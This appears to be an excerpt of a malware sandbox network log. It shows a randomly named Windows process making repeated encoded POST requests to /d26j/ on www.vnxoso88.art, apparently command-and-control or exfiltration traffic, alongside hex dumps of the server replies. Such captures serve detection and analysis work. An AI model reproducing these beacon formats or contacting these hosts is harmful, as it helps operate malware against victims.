                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Connection: close
                                                                                        Host: www.migraine-massages.pro
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Nov 6, 2024 16:00:15.881442070 CET1236INHTTP/1.1 200 OK
                                                                                        date: Wed, 06 Nov 2024 15:00:15 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1510
                                                                                        x-request-id: 6120e4ee-e090-41ef-928b-b3da0e74cbc7
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hD3xPYOyKBhdbmq3AutkMnyIYATMWmcRot6NJVPRW61hrtbgJrfx3YRx0int4qKyo+oWLk9tl5tjMKhKKaBnuQ==
                                                                                        set-cookie: parking_session=6120e4ee-e090-41ef-928b-b3da0e74cbc7; expires=Wed, 06 Nov 2024 15:15:15 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 44 33 78 50 59 4f 79 4b 42 68 64 62 6d 71 33 41 75 74 6b 4d 6e 79 49 59 41 54 4d 57 6d 63 52 6f 74 36 4e 4a 56 50 52 57 36 31 68 72 74 62 67 4a 72 66 78 33 59 52 78 30 69 6e 74 34 71 4b 79 6f 2b 6f 57 4c 6b 39 74 6c 35 74 6a 4d 4b 68 4b 4b 61 42 6e 75 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hD3xPYOyKBhdbmq3AutkMnyIYATMWmcRot6NJVPRW61hrtbgJrfx3YRx0int4qKyo+oWLk9tl5tjMKhKKaBnuQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Nov 6, 2024 16:00:15.881495953 CET963INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjEyMGU0ZWUtZTA5MC00MWVmLTkyOGItYjNkYTBlNzRjYmM3IiwicGFnZV90aW1lIjoxNzMwOTA1Mj


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.84971766.29.146.14805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:20.960102081 CET633OUTPOST /d26j/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 205
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vnxoso88.art
                                                                                        Origin: http://www.vnxoso88.art
                                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 47 53 2b 78 4f 46 4f 56 32 44 64 46 58 6c 41 39 30 6a 73 69 55 54 4e 56 55 6a 62 57 77 36 6c 33 42 66 55 50 4d 75 54 56 66 62 6d 77 48 58 59 2f 32 62 71 45 5a 68 59 56 4b 2f 4e 47 6f 51 34 68 4a 6b 64 79 39 64 74 6b 32 57 31 32 4d 78 5a 32 49 33 39 4f 2f 37 45 70 4e 6a 68 63 57 68 52 55 59 70 68 6d 58 5a 52 33 45 68 64 73 45 6e 72 6d 63 6e 55 55 61 38 6b 6a 67 76 71 50 73 52 74 4f 62 52 61 53 39 72 42 48 36 55 37 77 6c 68 45 54 74 57 71 4c 32 38 74 30 56 6b 71 72 53 72 30 55 65 37 30 5a 48 5a 63 39 74 79 61 72 75 42 39 2f 75 7a 33 4f 39 75 2b 39 6f 54 45 3d
                                                                                        Data Ascii: A60d=/R1zs/iKmff+GS+xOFOV2DdFXlA90jsiUTNVUjbWw6l3BfUPMuTVfbmwHXY/2bqEZhYVK/NGoQ4hJkdy9dtk2W12MxZ2I39O/7EpNjhcWhRUYphmXZR3EhdsEnrmcnUUa8kjgvqPsRtObRaS9rBH6U7wlhETtWqL28t0VkqrSr0Ue70ZHZc9tyaruB9/uz3O9u+9oTE=
                                                                                        Nov 6, 2024 16:00:21.665828943 CET1236INHTTP/1.1 404 Not Found
                                                                                        keep-alive: timeout=5, max=100
                                                                                        content-type: text/html
                                                                                        transfer-encoding: chunked
                                                                                        content-encoding: gzip
                                                                                        vary: Accept-Encoding
                                                                                        date: Wed, 06 Nov 2024 15:00:21 GMT
                                                                                        server: LiteSpeed
                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                        connection: close
                                                                                        Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                        Data Ascii: 134CZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                                        Nov 6, 2024 16:00:21.665848970 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                                        Nov 6, 2024 16:00:21.665860891 CET424INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                        Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                                        Nov 6, 2024 16:00:21.665908098 CET1236INData Raw: a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b6 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1 5d 6b d4
                                                                                        Data Ascii: cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$ .P,-i@DU\-
                                                                                        Nov 6, 2024 16:00:21.666208982 CET1100INData Raw: 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 48 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90 67 47 e1
                                                                                        Data Ascii: uW$FNcYXp8.Y*=HIV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<s84bm; ^W^F@0pC*0I+s:F7H|He+sZD'0,p$dEzBtb($Uk65


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.84971866.29.146.14805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:23.501157045 CET653OUTPOST /d26j/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 225
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vnxoso88.art
                                                                                        Origin: http://www.vnxoso88.art
                                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 52 33 42 36 77 50 4e 76 54 56 65 62 6d 77 4d 33 5a 31 79 62 71 4e 5a 68 55 6e 4b 39 5a 47 6f 51 73 68 4a 6d 31 79 39 75 56 6e 30 47 31 77 5a 42 5a 30 56 6e 39 4f 2f 37 45 70 4e 6a 45 35 57 68 5a 55 62 5a 78 6d 52 49 52 32 59 52 64 76 54 58 72 6d 59 6e 55 51 61 38 6b 56 67 75 32 70 73 53 5a 4f 62 56 65 53 39 2b 31 41 30 55 37 32 34 78 46 79 6f 7a 54 63 33 73 39 6a 49 48 79 34 53 39 6f 56 66 4e 46 7a 64 37 55 37 75 79 79 41 75 43 56 4a 72 45 71 6d 6e 4e 75 4e 32 45 51 58 77 48 4e 6c 68 57 65 4f 6a 72 4f 4d 55 7a 33 68 7a 38 41 77
                                                                                        Data Ascii: A60d=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJR3B6wPNvTVebmwM3Z1ybqNZhUnK9ZGoQshJm1y9uVn0G1wZBZ0Vn9O/7EpNjE5WhZUbZxmRIR2YRdvTXrmYnUQa8kVgu2psSZObVeS9+1A0U724xFyozTc3s9jIHy4S9oVfNFzd7U7uyyAuCVJrEqmnNuN2EQXwHNlhWeOjrOMUz3hz8Aw
                                                                                        Nov 6, 2024 16:00:24.157623053 CET1236INHTTP/1.1 404 Not Found
                                                                                        keep-alive: timeout=5, max=100
                                                                                        content-type: text/html
                                                                                        transfer-encoding: chunked
                                                                                        content-encoding: gzip
                                                                                        vary: Accept-Encoding
                                                                                        date: Wed, 06 Nov 2024 15:00:24 GMT
                                                                                        server: LiteSpeed
                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                        connection: close
                                                                                        Data Raw: 31 33 34 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                        Data Ascii: 134BZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|J
                                                                                        Nov 6, 2024 16:00:24.157656908 CET1236INData Raw: a0 04 fe 66 86 37 7e fe 96 b8 4e 68 0e fe 94 80 40 fa 62 98 f1 88 cc bb 3f df 6c 73 8b da 9b e1 5e 79 79 56 5e 32 d4 c3 a0 70 63 10 eb 9a 1b 07 ec e7 f4 11 0b f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7
                                                                                        Data Ascii: f7~Nh@b?ls^yyV^2pcO0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9
                                                                                        Nov 6, 2024 16:00:24.157676935 CET1236INData Raw: e1 b2 c4 27 0b 58 34 da 70 d9 69 82 ef 72 73 3b b1 24 71 62 db 82 c6 38 9d ee 1a 66 3a cd d5 99 44 eb ac 38 ed 5a d4 0e 66 21 4d 65 49 74 c6 3b 02 8f a1 b4 de f2 c9 36 88 d4 12 31 47 c6 d8 10 36 ee 78 8c 25 68 b5 8f 75 9a 0b e6 e2 24 1a a5 f5 82
                                                                                        Data Ascii: 'X4pirs;$qb8f:D8Zf!MeIt;61G6x%hu$#|NpTqf76[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-
                                                                                        Nov 6, 2024 16:00:24.157687902 CET1236INData Raw: 6d 08 e0 d4 0a dd b4 e7 e3 32 ae d7 4d c0 d2 1b 1a 33 09 f1 d4 c1 84 de 2d 8a 8e f4 b3 93 bd 45 74 ce 5f 12 27 6c 81 0b 90 1e 0f 77 22 4c 34 99 3d 2a f6 11 85 d3 79 83 a7 07 6f 05 a7 81 36 26 51 10 9a e5 51 45 2c dd 6d a7 76 75 94 fa f5 0c 5d 91
                                                                                        Data Ascii: m2M3-Et_'lw"L4=*yo6&QQE,mvu]iR*1>[$3L#$Sh=rirW:37,*27t1=fa(7k^'rAsoFT2;i|2r.eHQb;q-neJ'q
                                                                                        Nov 6, 2024 16:00:24.157706976 CET287INData Raw: ed 86 f9 6e 00 ff 84 fc 95 50 d7 77 ca 9f c8 72 cd fe 2d 52 3f 83 d3 9f 5e f0 f4 e7 4f 95 70 91 f3 bd 09 af 37 7a 1e fe 23 45 01 2d be 93 fd 59 43 77 df 1e e1 cf 56 3d c2 1f 59 e5 06 47 1f f0 75 15 09 5e 59 7c 7c ae e0 bd d7 f3 2f 83 ea d5 b7 fb
                                                                                        Data Ascii: nPwr-R?^Op7z#E-YCwV=YGu^Y||/[0q_*v /3?8SJs&(>pu<$CO@L(Yn~l-=a:{"}c@}`g7y


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.84971966.29.146.14805188C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 6, 2024 16:00:26.047923088 CET1670OUTPOST /d26j/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Content-Length: 1241
                                                                                        Cache-Control: max-age=0
                                                                                        Connection: close
                                                                                        Host: www.vnxoso88.art
                                                                                        Origin: http://www.vnxoso88.art
                                                                                        Referer: http://www.vnxoso88.art/d26j/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                        Data Raw: 41 36 30 64 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 48 78 32 78 49 6b 4f 56 6a 54 64 43 53 6c 41 39 2b 44 73 6d 55 54 52 56 55 69 76 47 78 4a 4a 33 42 49 34 50 4d 4d 37 56 45 62 6d 77 46 58 5a 30 79 62 72 66 5a 68 64 75 4b 39 56 57 6f 56 6f 68 49 48 56 79 31 2f 56 6e 2b 47 31 77 62 42 5a 35 49 33 38 4d 2f 37 55 31 4e 6a 55 35 57 68 5a 55 62 62 35 6d 48 70 52 32 4c 42 64 73 45 6e 72 71 63 6e 55 38 61 38 38 46 67 75 79 6d 73 42 42 4f 62 31 4f 53 2f 4d 74 41 38 55 37 30 37 78 46 51 6f 7a 57 62 33 73 67 61 49 45 75 57 53 36 45 56 66 72 55 46 45 34 6b 74 30 67 75 4b 67 46 4e 74 76 31 47 73 67 4f 57 51 38 6d 38 4a 35 52 70 4d 72 47 4b 77 68 4a 37 61 4c 57 7a 48 37 73 39 75 76 66 30 35 36 42 53 35 34 77 72 69 65 69 53 56 48 7a 72 44 2b 7a 6d 45 66 37 61 43 6f 6e 57 46 30 49 6b 54 67 59 41 75 4d 45 52 35 30 68 65 53 54 55 44 4d 47 68 75 56 79 33 4e 77 4c 6a 30 36 78 2b 67 4b 67 41 54 63 56 32 76 79 71 69 6b 44 55 7a 68 65 58 39 50 57 75 5a 44 74 74 71 49 5a 48 38 67 56 7a 45 51 57 33 67 49 4f 6a 70 47 35 42 [TRUNCATED]
                                                                                        Data Ascii: A60d=/R1zs/iKmff+Hx2xIkOVjTdCSlA9+DsmUTRVUivGxJJ3BI4PMM7VEbmwFXZ0ybrfZhduK9VWoVohIHVy1/Vn+G1wbBZ5I38M/7U1NjU5WhZUbb5mHpR2LBdsEnrqcnU8a88FguymsBBOb1OS/MtA8U707xFQozWb3sgaIEuWS6EVfrUFE4kt0guKgFNtv1GsgOWQ8m8J5RpMrGKwhJ7aLWzH7s9uvf056BS54wrieiSVHzrD+zmEf7aConWF0IkTgYAuMER50heSTUDMGhuVy3NwLj06x+gKgATcV2vyqikDUzheX9PWuZDttqIZH8gVzEQW3gIOjpG5BSm+T/2up97WJtIRBMN4gWnu93PsaeOCjmBBPF1OZFqRSF881VxCH9RwOXJotPk0i4xu33NvG5VUAnhxdQ1N+q7hAxAo+EmuN5y3KpNOnsR5Z2UoI+PgvboYvk9U2zbLS6ZN8l4Qf3j0wmncgyJW/PR9dCRmK5+OjVY+kUF7KMk2hTZ2pwjh9r6zWEPPRaCHy/FEXSQvOpEMbJuZ9FhQsWy7Dvzrd38/l8HOtNpxMwAwuYNCKE22eHKdATVK5AInzL9dO9FIH2SAH1xmuc6HYS5W8prDlsD/eGRePG7kVhrPLdv/sat6ELQD8leCr2f+ds/PyVnxrcOgrg3CvOcAyZSLMKulQJ35I+VfrUe7QpQYPyin6UN4ZMDv0iDGaHVBRtklRqeAAAY3JJEFi9th5xnROSSKRagmSsutku1mqcCSdZjdDYQw+qHS6Vg7OKcrMIdMAUwWxpXvmFCPZ/yvkNUJ3g81myDWZL/bhMs91amOOgiBqoR5C2dak614LFyByVxfxl3SeZbBXxXGz1Efybmbw1VamSeV2bz7csMhc8ObzqJXTTEKPtPzzXwkn2L+Atkou6uLhqtcF49Z1Rf0S3lBiLGUWD2ANYVnJZjJiogFHB4qHVuwP8cEdCxmgWGo0azQDbZOG76xySzkDFv8tiUnW/6g6a2GVVo [TRUNCATED]
                                                                                        Nov 6, 2024 16:00:26.714097023 CET1236INHTTP/1.1 404 Not Found
                                                                                        keep-alive: timeout=5, max=100
                                                                                        content-type: text/html
                                                                                        transfer-encoding: chunked
                                                                                        content-encoding: gzip
                                                                                        vary: Accept-Encoding
                                                                                        date: Wed, 06 Nov 2024 15:00:26 GMT
                                                                                        server: LiteSpeed
                                                                                        x-turbo-charged-by: LiteSpeed
                                                                                        connection: close
                                                                                        Data Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 22 44 4d 55 cf 68 43 12 20 21 09 04 08 87 e3 86 d0 8e 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 da b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e [TRUNCATED]
                                                                                        Data Ascii: 134CZJvL"DMUhC !V's=pB<w?qve o=|3q+{XV)w]vtOXv,"fv?BGV]nyyG=6jZ:UMh/0K'wRUX7!JV&Y:s*^o/^9~$O~nUh[_[_~\Vgay~0S>pC?W#g-;^`8+]icpXn9N*0}/]=FNXt3;?k?hvg&cZ*{pd$giWZ^VVU:{g_huZe~^!8.r}nY o}(n6|8Bkl7r=W3_w8MM.mJ[Oua&H~p0}s1qCa&l+,&UCo{0!- ~WxWt k_x2.?@in=&15}d_Pc%f/i|*C7{CrwMZSY_}d|V68!7~v$\>a} 5w>)$[};oRzGYF"?V'KR=Y6$|?Lo-t&@N[\p OKZ/G;
                                                                                        Nov 6, 2024 16:00:26.714118958 CET212INData Raw: 02 25 f0 37 33 bc f1 f3 b7 c4 75 42 6b f0 a7 04 04 d2 17 c3 8c 48 2a ef fe 7c b3 cd 2d 6a 6f 86 7b e5 e5 59 79 c9 50 0f 83 c2 8d 41 ac 6b 6e 1c b0 9f d3 47 2c e0 3f ed c3 20 08 1d c7 4d df 58 ea 47 fb 76 95 9f 2e c8 7e f6 eb f7 f3 de d8 ef 57 dc
                                                                                        Data Ascii: %73uBkH*|-jo{YyPAknG,? MXGv.~Wa'~K$PSy\pC{Ov=}K;c#,{tRz2}GH}/>7y!$E`c
                                                                                        Nov 6, 2024 16:00:26.714215994 CET1236INData Raw: f7 33 de 9c cb da 97 59 5c 57 1f 38 d7 cb 61 fc 2a 7e f4 2b fb f6 7a bc f9 60 e8 55 24 e4 e6 9c de 2f bb 51 ce cb 81 fb d9 fa 1f 00 e8 26 5f 7f 66 f8 37 aa 1f 04 9f f1 18 a8 f6 7f 11 7c 7e 0c 1b 75 11 ff c9 b1 2a eb e1 12 46 e0 3c f5 ff b2 b7 4a
                                                                                        Data Ascii: 3Y\W8a*~+z`U$/Q&_f7|~u*F<J$kfL34ei_jYZ;NS'h!/{$?2CYR[}^4[mj:D7YB:b@R:LY#l93+p8-T'KvG+
                                                                                        Nov 6, 2024 16:00:26.714227915 CET1236INData Raw: f3 0e a3 2c 14 7a ac 2c 36 26 df d6 c7 21 41 07 aa db e1 8a 25 69 f3 56 94 24 2d d6 22 75 df 96 fa 24 77 12 67 0f 07 1c b5 5a 72 6c bb 62 6a 6a 83 23 e5 52 0a 97 23 80 98 76 37 62 7d da e5 0e b1 25 8f a3 8a e6 10 48 ee 5a 70 39 4d 6d cb 95 25 67
                                                                                        Data Ascii: ,z,6&!A%iV$-"u$wgZrlbjj#R#v7b}%HZp9Mm%g.qFB\L^m>4n3N=7XO9a6"8jja+;E>rfTiN]OvVZ,b ZkBp;nacv!oAYc!ZZ+Gek~?
